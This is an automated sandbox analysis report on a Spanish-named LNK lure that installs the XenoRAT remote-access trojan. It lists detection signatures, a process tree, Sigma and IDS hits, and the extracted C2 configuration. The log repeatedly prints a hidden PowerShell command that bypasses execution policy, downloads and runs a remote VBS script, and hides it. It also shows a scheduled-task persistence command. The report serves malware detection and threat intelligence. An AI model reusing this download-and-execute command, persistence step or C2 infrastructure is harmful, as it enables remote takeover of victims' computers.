Windows Analysis Report
TRANSFERENCIA COMPROBANTES.lnk

Overview

General Information

Sample name: TRANSFERENCIA COMPROBANTES.lnk
Analysis ID: 1571198
MD5: e03e7eeb288c1f96bb336fe0bfa4cb95
SHA1: e2a53c23480aad659723ee5c8542105955787ac1
SHA256: a43b59c54921c6b5cc272e0af9917b5973231de9b6d183be381c1820416ce49f
Tags: lnk, user-abuse_ch

Detection

XenoRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Powershell download and execute
Yara detected XenoRAT
.NET source code contains potential unpacker
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Office process drops PE file
Office process queries suspicious COM object (likely to drop second stage)
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows shortcut file (LNK) contains suspicious command line arguments
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • powershell.exe (PID: 2892 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden'; MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 2012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • wscript.exe (PID: 6560 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • WINWORD.EXE (PID: 7240 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)
    • GFKMTE.exe (PID: 8044 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" MD5: 94A7E3859C2E4238421CDFE73D49603C)
      • GFKMTE.exe (PID: 8076 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
        • GFKMTE.exe (PID: 576 cmdline: "C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe" MD5: 94A7E3859C2E4238421CDFE73D49603C)
          • GFKMTE.exe (PID: 1876 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
          • GFKMTE.exe (PID: 1168 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
          • GFKMTE.exe (PID: 3672 cmdline: C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
      • GFKMTE.exe (PID: 8084 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
        • schtasks.exe (PID: 7828 cmdline: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F MD5: 48C2FE20575769DE916F48EF0676A965)
          • conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • GFKMTE.exe (PID: 8112 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
  • svchost.exe (PID: 7408 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • GFKMTE.exe (PID: 6972 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
    • GFKMTE.exe (PID: 7176 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
    • GFKMTE.exe (PID: 7184 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
      • WerFault.exe (PID: 8060 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7184 -s 80 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • GFKMTE.exe (PID: 5528 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe MD5: 94A7E3859C2E4238421CDFE73D49603C)
  • cleanup
{"C2 url": "dns.stipamana.com", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
Source | Rule | Description | Author | Strings
00000018.00000002.1481629234.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
00000019.00000002.1512091151.0000000002BBF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
0000001F.00000002.1647276247.0000000002C60000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
00000019.00000002.1512091151.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
0000001F.00000002.1647276247.0000000002A55000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |

Source | Rule | Description | Author | Strings
24.2.GFKMTE.exe.400000.0.unpack | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
25.2.GFKMTE.exe.29ba2dc.0.unpack | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
21.2.GFKMTE.exe.293a5ec.2.unpack | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
21.2.GFKMTE.exe.293a5ec.2.raw.unpack | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |
25.2.GFKMTE.exe.29ba2dc.0.raw.unpack | JoeSecurity_XenoRAT | Yara detected XenoRAT | Joe Security |

Source | Rule | Description | Author | Strings
amsi64_2892.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |

System Summary

                        Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ProcessId: 7240, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2892, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , ProcessId: 6560, ProcessName: wscript.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 94.156.167.57, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6560, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
                        Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7240, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , ProcessId: 8044, ProcessName: GFKMTE.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 7240, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe" , ProcessId: 8044, ProcessName: GFKMTE.exe
                        Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2892, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , ProcessId: 6560, ProcessName: wscript.exe
                        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2892, TargetFilename: C:\Users\user\Desktop\pafdfgz.vbs
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 94.156.167.57, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6560, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49701
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentProcessId: 8084, ParentProcessName: GFKMTE.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, ProcessId: 7828, ProcessName: schtasks.exe
                        Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49727, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, Initiated: true, ProcessId: 7240, Protocol: tcp, SourceIp: 94.156.167.57, SourceIsIpv6: false, SourcePort: 443
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 2892, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\pafdfgz.vbs" , ProcessId: 6560, ProcessName: wscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';, ProcessId: 2892, ProcessName: powershell.exe
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7408, ProcessName: svchost.exe

Persistence and Installation Behavior

                        Source: Process startedAuthor: Joe Security: Data: Command: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentImage: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe, ParentProcessId: 8084, ParentProcessName: GFKMTE.exe, ProcessCommandLine: "schtasks.exe" /Create /TN "mrec" /XML "C:\Users\user\AppData\Local\Temp\tmp80A6.tmp" /F, ProcessId: 7828, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-09T06:52:28.060737+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49701 | 94.156.167.57 | 443 | TCP
2024-12-09T06:52:37.409124+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49728 | 52.123.243.181 | 443 | TCP

AV Detection

                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\cfdhxdzhtfxgh[1].exe | Avira: detection malicious, Label: TR/Dropper.MSIL.Gen
                        Source: C:\Users\user\AppData\Local\Temp\ .doc | Avira: detection malicious, Label: HEUR/Macro.Downloader.MRDO.Gen
                        Source: 21.2.GFKMTE.exe.293a5ec.2.raw.unpack | Malware Configuration Extractor: XenoRAT {"C2 url": "dns.stipamana.com", "Mutex Name": "Xeno_rat_nd8912d", "Install Folder": "appdata"}
